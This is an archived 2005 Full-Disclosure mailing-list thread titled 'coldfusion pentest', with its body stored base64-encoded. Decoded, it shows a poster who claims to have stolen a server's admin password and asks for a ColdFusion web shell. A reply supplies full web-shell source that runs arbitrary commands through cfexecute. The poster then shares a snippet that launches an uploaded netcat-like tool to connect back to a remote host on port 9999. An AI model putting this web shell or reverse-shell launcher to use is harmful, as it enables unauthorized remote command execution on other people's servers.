lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue May 10 10:24:19 2005
From: fatb at security.zz.ha.cn (fatb)
Subject: coldfusion pentest

dGh4IDopDQoNCnRoZSBzY3JpcHQgZnJvbSBzZWN1cml0ZWFtIHdhcyBmcm9tIEt1cnQgR3J1dHpt
YWNoZXIgb3JpZ2luYWxseSxpdCBjb3VsZCBub3QgcnVuIGluIG15IGJveA0KDQphbmQgSW0gc3Vj
Y2Vzc2Z1bCBnb3QgYSB3b3JraW5nIHNoZWxsIGJ5IHVwbG9hZGluZyBhIG5jIGxpa2UgdG9vbCBh
bmQgdXNlIHRoZSBmb2xsb3dpbmcgc2NyaXB0IHRvIHJ1biBpdA0KDQo8aHRtbD4NCjxib2R5Pg0K
PGNmZXhlY3V0ZSBuYW1lPSJEOlxoYWhhLmV4ZSINCiAgICAgICAgICAgICAgICAgYXJndW1lbnRz
PSItY29ubmVjdCAxLjEuMS4gOTk5OSINCiAgICAgICAgICAgICAgICAgdGltZW91dD0iMjAiPg0K
ICAgICAgPC9jZmV4ZWN1dGU+DQo8L2JvZHk+DQo8L2h0bWw+DQoNCm5vIG1hdHRlciBob3csSSB0
aG91Z2h0IG1hbnkgZ3V5cyB3aG8gbGlrZSBtZSBuZWVkIGEgd29ya2luZyBjZiB3ZWJzaGVsbCxi
ZWNhdXNlIHRoZSB1cGxvYWQgc2NyaXB0IGRvIG5vdCBhbGxvdyB1cyB0byB1cGxvYWQgZXhlIG9y
IHNvbWUgb3RoZXIga2luZHMgb2YgZmlsZXMNCg0KDQoNCi0tLS0tIE9yaWdpbmFsIE1lc3NhZ2Ug
LS0tLS0gDQpGcm9tOiAiSmF2aWVyIFJlb3lvIiA8amF2aWVyLnJlb3lvQGludGVyZG9taW5pb3Mu
Y29tPg0KVG86IDxmdWxsLWRpc2Nsb3N1cmVAbGlzdHMuZ3Jvay5vcmcudWs+DQpTZW50OiBUdWVz
ZGF5LCBNYXkgMTAsIDIwMDUgNDozMSBQTQ0KU3ViamVjdDogUmU6IFtGdWxsLWRpc2Nsb3N1cmVd
IGNvbGRmdXNpb24gcGVudGVzdA0KDQoNCj4gSGkgZmF0YiwNCj4gDQo+IA0KPiB0aGlzIGlzIGZy
b20gbWFpbGluZyBvZiBzZWN1cml0ZWFtLiBUcnkgaXQuDQo+IA0KPiAgQ29sZEZ1c2lvbiBXZWIg
U2hlbGwNCj4gLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+IA0KPiANCj4gU1VNTUFSWQ0KPiANCj4gDQo+IA0K
PiBERVRBSUxTDQo+IA0KPiBUaGUgZm9sbG93aW5nIHNvdXJjZSBjb2RlIHdpbGwgZ2VuZXJhdGUg
YSB3ZWIgYmFzZWQgc2hlbGwgd2hlbmV2ZXIgaXQgaXMNCj4gZXhlY3V0ZWQgdW5kZXIgdGhlIENv
bGRGdXNpb24gZW52aXJvbm1lbnQuDQo+IA0KPiBUb29sIHNvdXJjZSBjb2RlOg0KPiA8IGh0bWw+
DQo+IDwgYm9keT4NCj4gDQo+IDwgY2ZvdXRwdXQ+DQo+IDwgdGFibGU+DQo+IDwgZm9ybSBtZXRo
b2Q9IlBPU1QiIGFjdGlvbj0iY2ZleGVjLmNmbSI+DQo+IDwgdHI+DQo+ICA8IHRkPkNvbW1hbmQ6
PC90ZD4NCj4gIDwgdGQ+IDwgaW5wdXQgdHlwZT10ZXh0IG5hbWU9ImNtZCIgc2l6ZT01MDwgY2Zp
ZiBpc2RlZmluZWQoImZvcm0uY21kIik+DQo+IHZhbHVlPSIjZm9ybS5jbWQjIiA8L2NmaWY+PiA8
IGJyPjwvdGQ+DQo+IDwvdHI+DQo+IDwgdHI+DQo+ICA8IHRkPk9wdGlvbnM6PC90ZD4NCj4gIDwg
dGQ+IDwgaW5wdXQgdHlwZT10ZXh0IG5hbWU9Im9wdHMiIHNpemU9NTAgPCBjZmlmDQo+IGlzZGVm
aW5lZCgiZm9ybS5vcHRzIik+IHZhbHVlPSIjZm9ybS5vcHRzIyIgPC9jZmlmPiA+PCBicj4gPC90
ZD4NCj4gPC90cj4NCj4gPCB0cj4NCj4gIDwgdGQ+VGltZW91dDo8L3RkPg0KPiAgPCB0ZD48IGlu
cHV0IHR5cGU9dGV4dCBuYW1lPSJ0aW1lb3V0IiBzaXplPTQgPCBjZmlmDQo+IGlzZGVmaW5lZCgi
Zm9ybS50aW1lb3V0Iik+IHZhbHVlPSIjZm9ybS50aW1lb3V0IyIgPCBjZmVsc2U+IHZhbHVlPSI1
Ig0KPiA8L2NmaWY+ID4gPC90ZD4NCj4gPC90cj4NCj4gPC90YWJsZT4NCj4gPCBpbnB1dCB0eXBl
PXN1Ym1pdCB2YWx1ZT0iRXhlYyIgPg0KPiA8L0ZPUk0+DQo+IA0KPiA8IGNmc2F2ZWNvbnRlbnQg
dmFyaWFibGU9Im15VmFyIj4NCj4gPCBjZmV4ZWN1dGUgbmFtZSA9ICIjRm9ybS5jbWQjIiBhcmd1
bWVudHMgPSAiI0Zvcm0ub3B0cyMiIHRpbWVvdXQgPQ0KPiAiI0Zvcm0udGltZW91dCMiPg0KPiA8
L2NmZXhlY3V0ZT4NCj4gPC9jZnNhdmVjb250ZW50Pg0KPiA8IHByZT4NCj4gI215VmFyIw0KPiA8
L3ByZT4NCj4gPC9jZm91dHB1dD4NCj4gPC9ib2R5Pg0KPiA8L2h0bWw+DQo+IA0KPiANCj4gQURE
SVRJT05BTCBJTkZPUk1BVElPTg0KPiANCj4gVGhlIGluZm9ybWF0aW9uIGhhcyBiZWVuIHByb3Zp
ZGVkIGJ5ICA8bWFpbHRvOmdydXR6QGppbmdvamFuZ28ubmV0PiBLdXJ0DQo+IEdydXR6bWFjaGVy
Lg0KPiANCj4gDQo+IA0KPiA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
DQo+IA0KPiAtLS0tLSBPcmlnaW5hbCBNZXNzYWdlIC0tLS0tIA0KPiBGcm9tOiAiZmF0YiIgPGZh
dGJAc2VjdXJpdHkuenouaGEuY24+DQo+IFRvOiA8cGVuLXRlc3RAc2VjdXJpdHlmb2N1cy5jb20+
DQo+IENjOiA8ZnVsbC1kaXNjbG9zdXJlQGxpc3RzLmdyb2sub3JnLnVrPg0KPiBTZW50OiBUdWVz
ZGF5LCBNYXkgMTAsIDIwMDUgNDo0MyBBTQ0KPiBTdWJqZWN0OiBbRnVsbC1kaXNjbG9zdXJlXSBj
b2xkZnVzaW9uIHBlbnRlc3QNCj4gDQo+IA0KPj4gSGkgYWxsIGd1eXMNCj4+DQo+PiBJJ3ZlIHN1
Y2Nlc3NlZCBnZXQgdGhlIGFkbWluJ3MgcGFzc3dkIG9mIHRoZSB3ZWIgaW50ZXJmYWNlDQo+Pg0K
Pj4gYW5kIEkgY2FuIHVwbG9hZCBhbnkga2luZHMgb2YgZmlsZXMgdG8gdGhlIHNlcnZlcg0KPj4N
Cj4+IHRoZSBzZXJ2ZXIgaXMgcnVubmluZyBjb2xkZnVzaW9uIDQuNSB3aXRoIGlpcyA1LjANCj4+
DQo+PiBidXQgSSBjYW4gbm90IGZpbmQgYSBjb2xkZnVzaW9uIHdlYnNoZWxsIHRvIGNvbnRpbnVl
DQo+Pg0KPj4gYW55Ym9keSBjb3VsZCBiZSBraW5kIGVub3VnaCB0byBzZW5kIG1lIGEgIHdvcmtp
bmcgY29sZGZ1c2lvbiB3ZWJzaGVsbA0KPj4NCj4+IHRoeCBpbiBhZHZhbmNlZCENCj4gDQo+IA0K
PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+IC0tLS0NCj4gDQo+IA0KPj4gX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18NCj4+IEZ1bGwtRGlzY2xvc3VyZSAtIFdl
IGJlbGlldmUgaW4gaXQuDQo+PiBDaGFydGVyOiBodHRwOi8vbGlzdHMuZ3Jvay5vcmcudWsvZnVs
bC1kaXNjbG9zdXJlLWNoYXJ0ZXIuaHRtbA0KPj4gSG9zdGVkIGFuZCBzcG9uc29yZWQgYnkgU2Vj
dW5pYSAtIGh0dHA6Ly9zZWN1bmlhLmNvbS8NCj4gDQo+IF9fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fDQo+IEZ1bGwtRGlzY2xvc3VyZSAtIFdlIGJlbGlldmUg
aW4gaXQuDQo+IENoYXJ0ZXI6IGh0dHA6Ly9saXN0cy5ncm9rLm9yZy51ay9mdWxsLWRpc2Nsb3N1
cmUtY2hhcnRlci5odG1sDQo+IEhvc3RlZCBhbmQgc3BvbnNvcmVkIGJ5IFNlY3VuaWEgLSBodHRw
Oi8vc2VjdW5pYS5jb20vDQo+

Powered by blists - more mailing lists